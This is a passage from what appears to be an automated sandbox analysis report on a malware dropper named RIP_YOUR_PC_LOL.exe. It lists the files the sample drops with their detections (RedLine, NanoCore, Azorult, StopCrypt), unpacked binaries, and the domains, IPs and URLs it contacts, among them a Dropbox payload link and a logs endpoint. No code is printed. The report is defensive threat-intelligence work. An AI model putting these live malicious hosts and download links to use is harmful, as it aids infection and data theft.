                    RIP_YOUR_PC_LOL.exe100%AviraTR/Dropper.MSIL.Gen7
                    RIP_YOUR_PC_LOL.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\AppData\Roaming\Opus.exe100%AviraTR/Dropper.MSIL.Gen7
                    C:\Users\user\AppData\Roaming\mediaget.exe100%AviraTR/ATRAPS.Gen
                    C:\Users\user\AppData\Roaming\___11.19.exe100%AviraTR/Dropper.GR
                    C:\Users\user\AppData\Roaming\___11.19.exe100%AviraTR/Agent.aagt
                    C:\Users\user\AppData\Roaming\healastounding.exe100%AviraTR/AD.RedLineSteal.cjshc
                    C:\Users\user\AppData\Roaming\healastounding.exe100%AviraTR/Dropper.MSIL.Gen7
                    C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe100%AviraTR/AD.MalwareCrypter.rrsdk
                    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%AviraTR/Dropper.MSIL.Gen7
                    C:\Windows\Help\active_desktop_render.dll100%AviraHEUR/AGEN.1245024
                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe100%AviraTR/ATRAPS.Gen
                    C:\Users\user\AppData\Roaming\gay.exe100%AviraTR/ATRAPS.Gen
                    C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\AppData\Roaming\22.exe100%AviraHEUR/AGEN.1227810
                    C:\Users\user\AppData\Roaming\Pluto Panel.exe100%AviraTR/AD.MExecute.lzrac
                    C:\Users\user\AppData\Roaming\Pluto Panel.exe100%AviraSPR/Tool.MailPassView.473
                    C:\Windows\Cursors\WUDFhosts.exe100%AviraHEUR/AGEN.1213003
                    C:\Users\user\AppData\Roaming\a.exe100%AviraTR/AD.RedLineSteal.cjshc
                    C:\Users\user\AppData\Roaming\3.exe100%AviraHEUR/AGEN.1203070
                    C:\Users\user\AppData\Roaming\test.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\AppData\Roaming\aaa.exe100%AviraTR/Dropper.MSIL.Gen
                    C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Opus.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\mediaget.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\___11.19.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\healastounding.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\4.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%Joe Sandbox ML
                    C:\Windows\Help\active_desktop_render.dll100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\gay.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\22.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Pluto Panel.exe100%Joe Sandbox ML
                    C:\Windows\Cursors\WUDFhosts.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\a.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\3.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\test.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\aaa.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe85%MetadefenderBrowse
                    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%ReversingLabsByteCode-MSIL.Backdoor.NanoCore
                    C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe29%MetadefenderBrowse
                    C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe86%ReversingLabsWin32.Trojan.Fragtor
                    C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe29%MetadefenderBrowse
                    C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe86%ReversingLabsWin32.Infostealer.Azorult
                    C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe29%MetadefenderBrowse
                    C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe92%ReversingLabsWin32.Ransomware.StopCrypt
                    C:\Users\user\AppData\Roaming\22.exe38%MetadefenderBrowse
                    C:\Users\user\AppData\Roaming\22.exe86%ReversingLabsWin32.Trojan.BlackMoon
                    C:\Users\user\AppData\Roaming\3.exe47%MetadefenderBrowse
                    C:\Users\user\AppData\Roaming\3.exe82%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
                    C:\Users\user\AppData\Roaming\4.exe17%MetadefenderBrowse
                    C:\Users\user\AppData\Roaming\4.exe75%ReversingLabsWin32.Trojan.SpyNoon
                    C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe26%MetadefenderBrowse
                    C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe86%ReversingLabsWin32.Infostealer.Azorult

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    11.0.22.exe.400000.12.unpack100%AviraHEUR/AGEN.1227810Download File
                    9.2.Opus.exe.840000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                    14.0.8f1c8b40c7be588389a8d382040b23bb.exe.476f20.4.unpack100%AviraTR/Dropper.GenDownload File
                    7.0.0fd7de5367376231a788872005d7ed4f.exe.400000.2.unpack100%AviraHEUR/AGEN.1242347Download File
                    4.0.healastounding.exe.900000.4.unpack100%AviraTR/AD.RedLineSteal.cjshcDownload File
                    4.0.healastounding.exe.900000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                    5.0.Pluto Panel.exe.f10000.8.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    5.0.Pluto Panel.exe.f10000.8.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    9.0.Opus.exe.840000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                    5.2.Pluto Panel.exe.f10000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    5.2.Pluto Panel.exe.f10000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    14.0.8f1c8b40c7be588389a8d382040b23bb.exe.4bdf52.2.unpack100%AviraTR/Dropper.GenDownload File
                    12.2.aaa.exe.2c0000.0.unpack100%AviraTR/Dropper.MSIL.GenDownload File
                    8.0.gay.exe.d0000.2.unpack100%AviraTR/ATRAPS.GenDownload File
                    12.0.aaa.exe.2c0000.2.unpack100%AviraTR/Dropper.MSIL.GenDownload File
                    0.3.RIP_YOUR_PC_LOL.exe.57b3478.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                    7.0.0fd7de5367376231a788872005d7ed4f.exe.400000.3.unpack100%AviraHEUR/AGEN.1242347Download File
                    11.0.22.exe.400000.0.unpack100%AviraHEUR/AGEN.1227810Download File
                    0.2.RIP_YOUR_PC_LOL.exe.5755c99.18.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                    11.0.22.exe.457136.14.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                    0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack100%AviraTR/Inject.vcoldiDownload File
                    14.0.8f1c8b40c7be588389a8d382040b23bb.exe.400000.3.unpack100%AviraTR/Dropper.GenDownload File
                    6.2.test.exe.da0000.0.unpack100%AviraTR/Dropper.GenDownload File
                    8.2.gay.exe.d0000.0.unpack100%AviraTR/ATRAPS.GenDownload File
                    12.0.aaa.exe.2c0000.1.unpack100%AviraTR/Dropper.MSIL.GenDownload File
                    4.2.healastounding.exe.900000.0.unpack100%AviraTR/AD.RedLineSteal.cjshcDownload File
                    4.2.healastounding.exe.900000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                    14.0.8f1c8b40c7be588389a8d382040b23bb.exe.476f20.1.unpack100%AviraTR/Dropper.GenDownload File
                    4.0.healastounding.exe.900000.0.unpack100%AviraTR/AD.RedLineSteal.cjshcDownload File
                    4.0.healastounding.exe.900000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                    14.0.8f1c8b40c7be588389a8d382040b23bb.exe.400000.6.unpack100%AviraTR/Dropper.GenDownload File
                    9.2.Opus.exe.5b00000.7.unpack100%AviraTR/NanoCore.fadteDownload File
                    14.0.8f1c8b40c7be588389a8d382040b23bb.exe.4bdf52.5.unpack100%AviraTR/Dropper.GenDownload File
                    11.0.22.exe.457136.21.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                    0.1.RIP_YOUR_PC_LOL.exe.dda1e2.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                    14.0.8f1c8b40c7be588389a8d382040b23bb.exe.400000.9.unpack100%AviraTR/Dropper.GenDownload File
                    0.2.RIP_YOUR_PC_LOL.exe.e387f7.8.unpack100%AviraTR/Patched.Ren.GenDownload File
                    11.0.22.exe.400000.6.unpack100%AviraHEUR/AGEN.1227810Download File
                    6.0.test.exe.da0000.0.unpack100%AviraTR/Dropper.GenDownload File
                    17.0.mediaget.exe.ab0000.3.unpack100%AviraTR/ATRAPS.GenDownload File
                    0.2.RIP_YOUR_PC_LOL.exe.d587a1.7.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                    11.0.22.exe.43de6f.2.unpack100%AviraHEUR/AGEN.1245024Download File
                    17.0.mediaget.exe.ab0000.0.unpack100%AviraTR/ATRAPS.GenDownload File
                    11.0.22.exe.43de6f.19.unpack100%AviraHEUR/AGEN.1245024Download File
                    11.0.22.exe.457136.9.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                    9.0.Opus.exe.840000.3.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                    11.0.22.exe.400000.18.unpack100%AviraHEUR/AGEN.1227810Download File
                    14.0.8f1c8b40c7be588389a8d382040b23bb.exe.4bdf52.8.unpack100%AviraTR/Dropper.GenDownload File
                    11.0.22.exe.43de6f.13.unpack100%AviraHEUR/AGEN.1245024Download File
                    14.0.8f1c8b40c7be588389a8d382040b23bb.exe.476f20.10.unpack100%AviraTR/Dropper.GenDownload File
                    0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack100%AviraTR/Inject.vcoldiDownload File
                    17.2.mediaget.exe.ab0000.0.unpack100%AviraTR/ATRAPS.GenDownload File
                    14.0.8f1c8b40c7be588389a8d382040b23bb.exe.476f20.7.unpack100%AviraTR/Dropper.GenDownload File
                    0.3.RIP_YOUR_PC_LOL.exe.5839748.8.unpack100%AviraHEUR/AGEN.1227785Download File
                    9.0.Opus.exe.840000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                    8.0.gay.exe.d0000.1.unpack100%AviraTR/ATRAPS.GenDownload File
                    8.0.gay.exe.d0000.0.unpack100%AviraTR/ATRAPS.GenDownload File
                    11.0.22.exe.457136.3.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                    0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack100%AviraTR/Patched.Ren.GenDownload File
                    4.2.healastounding.exe.4582ffa.11.unpack100%AviraTR/Dropper.GenDownload File
                    11.0.22.exe.43de6f.7.unpack100%AviraHEUR/AGEN.1245024Download File
                    0.0.RIP_YOUR_PC_LOL.exe.e387f7.8.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.0.RIP_YOUR_PC_LOL.exe.dda1e2.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                    12.0.aaa.exe.2c0000.0.unpack100%AviraTR/Dropper.MSIL.GenDownload File
                    0.2.RIP_YOUR_PC_LOL.exe.56d4258.19.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                    17.0.mediaget.exe.ab0000.1.unpack100%AviraTR/ATRAPS.GenDownload File
                    0.1.RIP_YOUR_PC_LOL.exe.d587a1.5.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                    0.2.RIP_YOUR_PC_LOL.exe.dda1e2.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                    4.0.healastounding.exe.900000.12.unpack100%AviraTR/AD.RedLineSteal.cjshcDownload File
                    4.0.healastounding.exe.900000.12.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                    0.3.RIP_YOUR_PC_LOL.exe.5956fd2.3.unpack100%AviraTR/Dropper.GenDownload File
                    7.0.0fd7de5367376231a788872005d7ed4f.exe.400000.1.unpack100%AviraHEUR/AGEN.1242347Download File
                    6.0.test.exe.da0000.2.unpack100%AviraTR/Dropper.GenDownload File
                    5.0.Pluto Panel.exe.f10000.4.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    5.0.Pluto Panel.exe.f10000.4.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    0.0.RIP_YOUR_PC_LOL.exe.d587a1.6.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                    5.0.Pluto Panel.exe.f10000.12.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    5.0.Pluto Panel.exe.f10000.12.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    5.0.Pluto Panel.exe.f10000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    5.0.Pluto Panel.exe.f10000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    6.0.test.exe.da0000.3.unpack100%AviraTR/Dropper.GenDownload File
                    0.2.RIP_YOUR_PC_LOL.exe.5821276.21.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.1.RIP_YOUR_PC_LOL.exe.e387f7.7.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.0.RIP_YOUR_PC_LOL.exe.1f6c52e.15.unpack100%AviraTR/Dropper.GenDownload File
                    0.2.RIP_YOUR_PC_LOL.exe.1f6c52e.15.unpack100%AviraTR/Dropper.GenDownload File
                    7.2.0fd7de5367376231a788872005d7ed4f.exe.400000.0.unpack100%AviraHEUR/AGEN.1242347Download File
                    12.0.aaa.exe.2c0000.3.unpack100%AviraTR/Dropper.MSIL.GenDownload File
                    0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack100%AviraTR/Inject.vcoldiDownload File
                    7.2.0fd7de5367376231a788872005d7ed4f.exe.24f15a0.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                    14.0.8f1c8b40c7be588389a8d382040b23bb.exe.4bdf52.11.unpack100%AviraTR/Dropper.GenDownload File
                    0.1.RIP_YOUR_PC_LOL.exe.ea57bf.8.unpack100%AviraTR/Patched.Ren.GenDownload File
                    14.0.8f1c8b40c7be588389a8d382040b23bb.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                    4.2.healastounding.exe.44c50a8.8.unpack100%AviraTR/Dropper.GenDownload File
                    0.2.RIP_YOUR_PC_LOL.exe.57b42ae.20.unpack100%AviraTR/Patched.Ren.GenDownload File
                    7.0.0fd7de5367376231a788872005d7ed4f.exe.400000.0.unpack100%AviraHEUR/AGEN.1242347Download File
                    17.0.mediaget.exe.ab0000.2.unpack100%AviraTR/ATRAPS.GenDownload File
                    9.0.Opus.exe.840000.2.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                    8.0.gay.exe.d0000.3.unpack100%AviraTR/ATRAPS.GenDownload File
                    4.0.healastounding.exe.900000.8.unpack100%AviraTR/AD.RedLineSteal.cjshcDownload File
                    4.0.healastounding.exe.900000.8.unpack100%AviraTR/Dropper.MSIL.Gen7Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.tiro.com=0%Avira URL Cloudsafe
                    http://www.urwpp.derasg0%Avira URL Cloudsafe
                    http://www.fontbureau.comd&0%Avira URL Cloudsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.sakkal.comm0%Avira URL Cloudsafe
                    http://www.fontbureau.comlicd0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/)0%URL Reputationsafe
                    http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
                    http://www.tiro.com&0%Avira URL Cloudsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://schemas.microsof0%URL Reputationsafe
                    http://www.i.0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/X0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/Q0%URL Reputationsafe
                    http://www.carterandcone.comY0%Avira URL Cloudsafe
                    http://www.zhongyicts.com.cno.W0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/J0%URL Reputationsafe
                    http://www.zhongyicts.com.cnm0%URL Reputationsafe
                    http://www.carterandcone.comt0%URL Reputationsafe
                    http://www.founder.com.cn/cncz0%Avira URL Cloudsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.founder.com.cn/cn/0%URL Reputationsafe
                    http://www.zhongyicts.co0%Avira URL Cloudsafe
                    http://www.fonts.comC0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/jp/)0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/eu-e0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/n0%URL Reputationsafe
                    http://www.zhongyicts.com.cnY0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/i0%URL Reputationsafe
                    http://www.fontbureau.comitu0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/g0%URL Reputationsafe
                    http://www.freeeim.com/D0%Avira URL Cloudsafe
                    http://www.tiro.comic0%URL Reputationsafe
                    http://www.founder.com.cn/cncz$0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn$0%URL Reputationsafe
                    http://www.carterandcone.comkC0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/ls0%Avira URL Cloudsafe
                    http://www.fontbureau.comFX0%Avira URL Cloudsafe
                    http://www.urwpp.deMTq0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/jp/C0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/jp/J0%URL Reputationsafe
                    http://www.founder.com.cn/cnT0%URL Reputationsafe
                    http://www.zhongyicts.com.cnts0%Avira URL Cloudsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.carterandcone.com0%URL Reputationsafe
                    http://www.fontbureau.comoX0%Avira URL Cloudsafe
                    http://www.carterandcone.com.0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://www.founder.com.cn/cnv0%URL Reputationsafe
                    http://www.fontbureau.comrsiv0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.de0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.carterandcone.como.W0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/jp/X0%URL Reputationsafe
                    http://www.fontbureau.comonyn0%Avira URL Cloudsafe
                    http://www.fontbureau.comF0%URL Reputationsafe
                    http://www.fontbureau.comsiv/C0%Avira URL Cloudsafe
                    http://www.carterandcone.comTC0%URL Reputationsafe
                    http://ocsp.thawte.com00%URL Reputationsafe
                    http://www.founder.com.cp0%Avira URL Cloudsafe
                    http://www.urwpp.deR0%Avira URL Cloudsafe
                    http://www.fontbureau.comtu0%Avira URL Cloudsafe
                    https://whatismyipaddress.comx&0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                    http://www.fontbureau.coma0%URL Reputationsafe
                    http://www.fontbureau.comd0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    kazya1.hopto.org
                    		41.249.51.34
                    		truefalse
                      		high
                      yabynennet.xyz
                      		45.129.99.212
                      		truefalse
                        		high
                        api.ipify.org.herokudns.com
                        		52.20.78.240
                        		truefalse
                          		high
                          whatismyipaddress.com
                          		104.16.154.36
                          		truefalse
                            		high
                            pool.usa-138.com
                            		220.86.85.75
                            		truefalse
                              		high
                              hackerinvasion.f3322.net
                              		127.0.0.1
                              		truefalse
                                		high
                                us-east-1.route-1000.000webhost.awex.io
                                		145.14.144.149
                                		truefalse
                                  		high
                                  gfhhjgh.duckdns.org
                                  		179.13.1.253
                                  		truefalse
                                    		high
                                    files.000webhost.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      22ssh.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        123.105.12.0.in-addr.arpa
                                        		unknown
                                        		unknownfalse
                                          		high
                                          store-images.s-microsoft.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            pretorian.ac.ug
                                            		unknown
                                            		unknownfalse
                                              		high
                                              api.ip.sb
                                              		unknown
                                              		unknownfalse
                                                		high
                                                api.ipify.org
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  prepepe.ac.ug
                                                  		unknown
                                                  		unknownfalse
                                                    		high

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://api.ipify.org/?format=xmlfalse
                                                      		high

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      http://www.tiro.com=Pluto Panel.exe, 00000005.00000003.445903668.0000000005C80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://www.urwpp.derasgPluto Panel.exe, 00000005.00000003.494373371.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.493190429.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.497114575.0000000005C80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.comd&Pluto Panel.exe, 00000005.00000003.539432667.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.561809650.0000000005C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://www.fontbureau.com/designersPluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.sajatypeworks.comPluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.founder.com.cn/cn/cThePluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.sakkal.commPluto Panel.exe, 00000005.00000003.461535327.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.462539198.0000000005C80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://dl.dropbox.com/s/p84aaz28t0hepul/Pass.exe?dl=0healastounding.exe, healastounding.exe, 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, healastounding.exe, 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, gay.exe, gay.exe, 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, mediaget.exe, 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, mediaget.exe, 00000011.00000003.646152049.0000000001338000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.comlicdPluto Panel.exe, 00000005.00000003.620876949.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.645268957.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.630356431.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.585753311.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.593605825.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://whatismyipaddress.com/-RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpfalse
                                                            		high
                                                            http://www.galapagosdesign.com/DPleasePluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.jiyu-kobo.co.jp/)Pluto Panel.exe, 00000005.00000003.448193641.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.457715522.0000000005C56000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.452001254.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.457092303.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.ascendercorp.com/typedesigners.htmlPluto Panel.exe, 00000005.00000003.462837238.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.463380932.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.461983546.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.460984251.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.site.com/logs.phpPluto Panel.exe, 00000005.00000002.705753147.0000000003691000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.tiro.com&Pluto Panel.exe, 00000005.00000003.434485944.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.434712918.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              http://www.urwpp.deDPleasePluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://whatismyipaddress.com/Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.705753147.0000000003691000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.nirsoft.net/Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                  		high
                                                                  http://www.zhongyicts.com.cnPluto Panel.exe, 00000005.00000003.437487558.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437239432.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436798009.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436695339.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437023378.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://schemas.microsofhealastounding.exefalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.i.Pluto Panel.exe, 00000005.00000003.423909901.0000000005C85000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.425696650.0000000005C85000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.jiyu-kobo.co.jp/XPluto Panel.exe, 00000005.00000003.448193641.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.459485550.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.460010944.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.452001254.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.461983546.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.460984251.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
